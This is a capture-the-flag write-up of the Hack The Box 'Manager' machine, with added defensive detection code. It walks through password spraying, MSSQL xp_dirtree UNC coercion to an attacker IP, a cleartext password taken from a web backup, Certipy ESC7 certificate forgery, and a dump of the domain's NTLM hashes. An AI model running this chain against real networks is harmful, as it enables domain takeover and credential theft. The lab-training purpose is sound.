HTB-Manager(Medium)

admin  2023-10-25 22:12:00

Key points: RID enumeration of users followed by password spraying; MSSQL xp_dirtree to probe for sensitive files; ADCS ESC7 privilege escalation.

Scan

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# nmap -sC -sV -Pn 10.10.11.236
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-24 10:14 EDT
Nmap scan report for 10.10.11.236
Host is up (0.38s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-24 19:39:02Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-10-24T19:40:39+00:00; +5h24m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-10-24T19:40:38+00:00; +5h24m01s from scanner time.
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-24T17:16:19
|_Not valid after:  2053-10-24T17:16:19
| ms-sql-info: 
|   10.10.11.236:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2023-10-24T19:40:39+00:00; +5h24m01s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.236:1433: 
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
|_ssl-date: 2023-10-24T19:40:39+00:00; +5h23m59s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T19:40:38+00:00; +5h24m01s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-10-24T19:39:57
|_  start_date: N/A
|_clock-skew: mean: 5h23m59s, deviation: 1s, median: 5h23m59s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.60 seconds


Enum

A quick round of enumeration:

crackmapexec smb 10.10.11.236  -u guest -p '' --shares --rid-brute 10000

Pull the usernames out of the RID brute-force output and write them to users.txt:

Administrator
Guest
krbtgt
DC01$
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator

There was no usable roasting, so I simply tried each username as its own password (note that the entries in the txt must be changed to lowercase) and got operator.

crackmapexec smb 10.10.11.236 -u users.txt -p users.txt --no-brute
# --no-brute: it does not try every username/password combination, only the supplied username and password pairs.


mssql

The nmap scan showed that the MSSQL service is also open, so test that too; it gives operator as well.

crackmapexec mssql 10.10.11.236 -u users.txt -p users.txt --no-brute

Use the Impacket client to get into MSSQL:

impacket-mssqlclient manager.htb/operator:operator@10.10.11.236 -windows-auth



xp_dirtree

Tried xp_cmdshell and others; found that xp_dirtree can be executed. What comes back over the UNC path is the DC$ hash. Normally you would save it to a file and crack it with john, but the DC$ hash here cannot be cracked:

python3 /usr/share/responder/Responder.py -I tun0 -i 10.10.14.92 -v
SQL> xp_dirtree "\\10.10.14.92\geqian"

No luck there, so keep using xp_dirtree to walk directories, which turns up website-backup-27-07-23-old.zip:

xp_dirtree 'C:\inetpub\wwwroot' ,0 ,1
# 0: the depth parameter, which sets how deep the directory traversal goes. 0 traverses only the specified directory itself, not its subdirectories; use 1 if you want to traverse subdirectories.
# 1: the file-type parameter, which filters what is returned. 1 returns files only, not subdirectories; use 0 if you want subdirectories returned.
# website-backup-27-07-23-old.zip shows up here
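The detection side of the xp_dirtree step above, as an added example that is not part of the original writeup or of any tool it mentions: a small classifier run over constructed SQL Server audit-style lines. The line format (timestamp, login=, stmt=) is an assumption of this example, not the format of any real audit output; in practice the statement text would come from a SQL Server Audit or an Extended Events session capturing batch text. The logic flags path-taking extended stored procedures, and raises severity when the argument is a UNC path, because that is what makes the SQL Server service account authenticate outbound to the named host.

```python
import re

# Constructed SQL Server audit-style lines (not output from the box). Format assumed by
# this example: "<timestamp> login=<login> stmt=<statement text>".
CONSTRUCTED_AUDIT_LINES = [
    r"2023-10-24T19:41:10Z login=MANAGER\Operator stmt=EXEC xp_dirtree 'C:\inetpub\wwwroot', 0, 1",
    r'2023-10-24T19:41:32Z login=MANAGER\Operator stmt=xp_dirtree "\\10.10.14.92\geqian"',
    r"2023-10-24T19:42:01Z login=MANAGER\Operator stmt=EXEC master..xp_fileexist '\\10.10.14.92\share\x.txt'",
    r"2023-10-24T19:43:15Z login=MANAGER\svc_app stmt=SELECT name FROM sys.databases",
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+login=(?P<login>\S+)\s+stmt=(?P<stmt>.*)$")
# Extended stored procedures that accept a file-system path and will follow a UNC path.
XP_RE = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b", re.IGNORECASE)
# "\\host\share..." : capture the host part of a UNC path.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9_.-]+)\\")


def classify(line: str):
    """Return a finding dict for a path-taking xp_* call, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    stmt = m.group("stmt")
    xp = XP_RE.search(stmt)
    if not xp:
        return None
    unc = UNC_RE.search(stmt)
    return {
        "ts": m.group("ts"),
        "login": m.group("login"),
        "procedure": xp.group(1).lower(),
        "unc_host": unc.group(1) if unc else None,
        # A UNC target means an outbound authentication by the service account: high.
        # A local path is still worth a look (file-system enumeration) but lower priority.
        "severity": "high" if unc else "medium",
    }


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f is not None]


def coercion_targets(lines):
    """Distinct hosts the SQL service account was made to authenticate to."""
    return sorted({f["unc_host"] for f in scan(lines) if f["unc_host"]})


if __name__ == "__main__":
    for f in scan(CONSTRUCTED_AUDIT_LINES):
        print(f"[{f['severity']}] {f['ts']} {f['login']} {f['procedure']} unc_host={f['unc_host']}")
    print("hosts contacted:", coercion_targets(CONSTRUCTED_AUDIT_LINES))
```

On the hardening side, the same three findings point at the usual fixes: do not grant EXECUTE on xp_dirtree, xp_fileexist and xp_subdirs to non-sysadmin logins (the low-privileged operator login could run them here), block outbound SMB from the database host at the firewall, and enforce SMB signing so a captured authentication cannot be relayed.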

That is exactly the web root, so just browse to http://10.10.11.236/website-backup-27-07-23-old.zip and download it; an XML file inside contains a password:

<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>
This gives raven@manager.htb : R4v3nBe5tD3veloP3r!123
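A defender-side check for the root cause of this step (a backup archive under the web root carrying an LDAP bind password in cleartext), as an added example that is not part of the original writeup or of any project it mentions. The archive, its member names, the host and user names and the placeholder password are all constructed for the example; the set of element names treated as secret-bearing is an assumption to be extended for your own configuration formats. The scanner opens a zip in memory, parses every XML-looking member and reports the path of each credential element with its value redacted, so the report itself does not spread the secret.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Constructed stand-in for a backup left under the web root: an LDAP client
# configuration that carries a bind password. Host, user and password are
# placeholders made up for this example.
CONSTRUCTED_LDAP_CONF = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <host>dc01.example.test</host>
    <search-base>dc=example,dc=test</search-base>
    <access-user>
      <user>svc_ldap@example.test</user>
      <password>PLACEHOLDER_NOT_A_REAL_SECRET</password>
    </access-user>
  </server>
</ldap-conf>
"""

# Element names treated as secret-bearing (assumption; extend to match your configs).
SECRET_TAGS = {"password", "passwd", "pwd", "secret", "api-key", "apikey", "token"}


def build_sample_zip() -> bytes:
    """Build an in-memory archive resembling website-backup-*.zip (constructed data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("website/ldap.conf.xml", CONSTRUCTED_LDAP_CONF)
        zf.writestr("website/index.html", "<html><body>Manager</body></html>")
        zf.writestr("website/notes.txt", "nothing sensitive here")
    return buf.getvalue()


def redact(value: str) -> str:
    """Keep a two-character prefix so a finding is recognisable without leaking the value."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "**"


def find_secrets_in_xml(data: bytes, member_name: str) -> list:
    """Walk an XML document and report non-empty elements whose tag looks secret-bearing."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return []  # not XML after all; a real scanner would hand it to other detectors
    findings = []

    def walk(elem, path):
        tag = elem.tag.rsplit("}", 1)[-1]  # drop any "{namespace}" prefix
        here = f"{path}/{tag}"
        text = (elem.text or "").strip()
        if tag.lower() in SECRET_TAGS and text:
            findings.append({"file": member_name, "element": here, "preview": redact(text)})
        for child in elem:
            walk(child, here)

    walk(root, "")
    return findings


def scan_archive(zip_bytes: bytes) -> list:
    """Open a zip in memory and check every XML-looking member for embedded credentials."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info.filename)
            if data.lstrip().startswith(b"<"):
                findings.extend(find_secrets_in_xml(data, info.filename))
    return findings


if __name__ == "__main__":
    for f in scan_archive(build_sample_zip()):
        print(f"{f['file']}: {f['element']} = {f['preview']}")
```

Run against the archive found on this box, a scanner like this would have flagged /ldap-conf/server/access-user/password before the zip ever reached a public web root; the durable fixes are to keep backups out of the document root, keep bind credentials out of config files that get backed up (or encrypt them), and give the LDAP bind account no more rights than its lookup needs.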


user

Log in as the Raven user:

evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'

raven turns out to be a member of the "Certificate Service DCOM Access" group, so check ADCS; this reveals ESC7:


whoami /all
certipy-ad find -vulnerable -stdout -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
manager-DC01-CA


ADCS ESC7

Follow the expert's write-up step by step: https://github.com/ly4k/Certipy#esc7

# If you only have Manage CA access, you can grant yourself Manage Certificates access by adding your user as a new officer.
certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'

# The SubCA template can be enabled on the CA with the -enable-template parameter. By default, the SubCA template is already enabled.
certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -debug

# With the prerequisites for this attack met, first request a certificate based on the SubCA template. The request will be denied, but save the private key and note the request ID.
┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn administrator@manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate

# With both Manage CA and Manage Certificates, the failed request can be issued with the ca command and the -issue-request <request ID> parameter.
certipy-ad ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
# If this step fails with "Got access denied trying to issue certificate", run the add-officer step from the beginning again.

# Finally, retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.
certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 13

# ntpdate, short for "Network Time Protocol Date and Time", syncs the clock with the domain (the scan showed about 5h24m of skew, and Kerberos rejects requests with too much skew).
# auth performs the authentication with the certificate.
sudo ntpdate -s 10.10.11.236
certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.10.11.236


Full procedure:

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'MANAGER.HTB' at '192.168.141.2'
[+] Resolved 'MANAGER.HTB' from cache: 10.10.11.236
[+] Trying to get DCOM connection for: 10.10.11.236
[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.236:636 - ssl
[+] Default path: DC=manager,DC=htb
[+] Configuration path: CN=Configuration,DC=manager,DC=htb
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn administrator@manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[-] Got access denied trying to issue certificate

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 13
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# sudo ntpdate -s 10.10.11.236

┌──(root㉿kali)-[/home/kali/Desktop/htb/manager]
└─# certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.10.11.236
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
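What the ESC7 sequence above looks like from the CA's own audit trail, as an added example that is not part of the original writeup or of Certipy: request 13 was denied, the certificate-manager settings changed (the add-officer step), and the same request 13 was then issued. The event records below are constructed and simplified; they are modelled on the Security-log CA audit events 4888 (Certificate Services denied a certificate request), 4887 (approved a request and issued a certificate) and 4890 (the certificate manager settings for Certificate Services changed), but the field names (time, event_id, subject, ca, request_id) are an assumption of this example, standing in for values a collector would pull out of the real events' data fields.

```python
# Constructed, simplified records modelled on AD CS audit events from the Security log.
# Assumption of this example: each record already has the request ID and CA name
# extracted from the event's data fields. Event IDs used:
#   4888  Certificate Services denied a certificate request
#   4887  Certificate Services approved a certificate request and issued a certificate
#   4890  The certificate manager settings for Certificate Services changed
EVENT_ISSUED, EVENT_DENIED, EVENT_MANAGER_CHANGED = 4887, 4888, 4890

CONSTRUCTED_EVENTS = [
    {"time": "2023-10-24T19:50:01Z", "event_id": 4888, "subject": "MANAGER\\Raven", "ca": "manager-DC01-CA", "request_id": 13},
    {"time": "2023-10-24T19:50:40Z", "event_id": 4890, "subject": "MANAGER\\Raven", "ca": "manager-DC01-CA", "request_id": None},
    {"time": "2023-10-24T19:51:05Z", "event_id": 4887, "subject": "MANAGER\\Raven", "ca": "manager-DC01-CA", "request_id": 13},
    # Unrelated, normal enrolment: issued without any prior denial, must not alert.
    {"time": "2023-10-24T19:55:00Z", "event_id": 4887, "subject": "MANAGER\\DC01$", "ca": "manager-DC01-CA", "request_id": 14},
]


def find_denied_then_issued(events):
    """Flag requests that were denied and later issued on the same CA, and attach any
    certificate-manager permission changes that happened between the two events."""
    events = sorted(events, key=lambda e: e["time"])  # ISO-8601 UTC strings sort lexically
    denied_at = {}        # (ca, request_id) -> time of the 4888
    manager_changes = []  # (time, subject) of each 4890
    alerts = []
    for e in events:
        key = (e["ca"], e["request_id"])
        if e["event_id"] == EVENT_MANAGER_CHANGED:
            manager_changes.append((e["time"], e["subject"]))
        elif e["event_id"] == EVENT_DENIED:
            denied_at[key] = e["time"]
        elif e["event_id"] == EVENT_ISSUED and key in denied_at:
            between = [c for c in manager_changes if denied_at[key] <= c[0] <= e["time"]]
            alerts.append({
                "ca": e["ca"],
                "request_id": e["request_id"],
                "denied_at": denied_at[key],
                "issued_at": e["time"],
                "issued_by": e["subject"],
                "manager_changes_between": between,
            })
    return alerts


def summarize(alert) -> str:
    """One-line description suitable for an alert body."""
    who = ", ".join(f"{s} at {t}" for t, s in alert["manager_changes_between"]) or "none"
    return (f"request {alert['request_id']} on {alert['ca']} denied at {alert['denied_at']}, "
            f"issued at {alert['issued_at']} by {alert['issued_by']}; "
            f"certificate-manager changes in between: {who}")


if __name__ == "__main__":
    for a in find_denied_then_issued(CONSTRUCTED_EVENTS):
        print(summarize(a))
```

These events only exist if the CA is actually auditing: the "Certification Services" audit subcategory must be enabled on the CA host and the CA's audit filter switched on (certutil -setreg CA\AuditFilter 127, followed by a restart of the CertSvc service). Independently of detection, the condition that made the chain possible is a low-privileged user holding ManageCA on the CA, so the CA's security tab (Manage CA / Issue and Manage Certificates) deserves the same periodic review as Domain Admins membership.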



Finally, dump all the hashes:

┌──(kali㉿kali)-[~/Desktop/htb/manager]
└─$ impacket-secretsdump [email protected] -hashes :ae5064c2f62317332c88629e025924ef -just-dc-ntlm
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b5edce70e6c1efa075f14bcf5231f79a:::
Zhong:1113:aad3b435b51404eeaad3b435b51404ee:7d148e27d43945dca3f9a9ae6cb93e47:::
Cheng:1114:aad3b435b51404eeaad3b435b51404ee:5f9fb454ca66927468e91362c391d4fb:::
Ryan:1115:aad3b435b51404eeaad3b435b51404ee:7f4e434796eeb1aa0c69630613dbc8a4:::
Raven:1116:aad3b435b51404eeaad3b435b51404ee:1635e153d4d6541a6367ec7a369d1fc7:::
JinWoo:1117:aad3b435b51404eeaad3b435b51404ee:43b026fc35e89627f2aed3420a1ff09b:::
ChinHae:1118:aad3b435b51404eeaad3b435b51404ee:bcc5893596907bc0672ee1a42f6b887b:::
Operator:1119:aad3b435b51404eeaad3b435b51404ee:e337e31aa4c614b2895ad684a51156df:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:452a4c05d648cefa2a173dbbcd2db654:::
[*] Cleaning up...


Originally published on the WeChat public account 搁浅安全: HTB-Manager(Medium)

Please keep this link when reposting (CN-SEC Chinese site; thanks to the original author for their hard work): https://cn-sec.com/archives/2145146.html
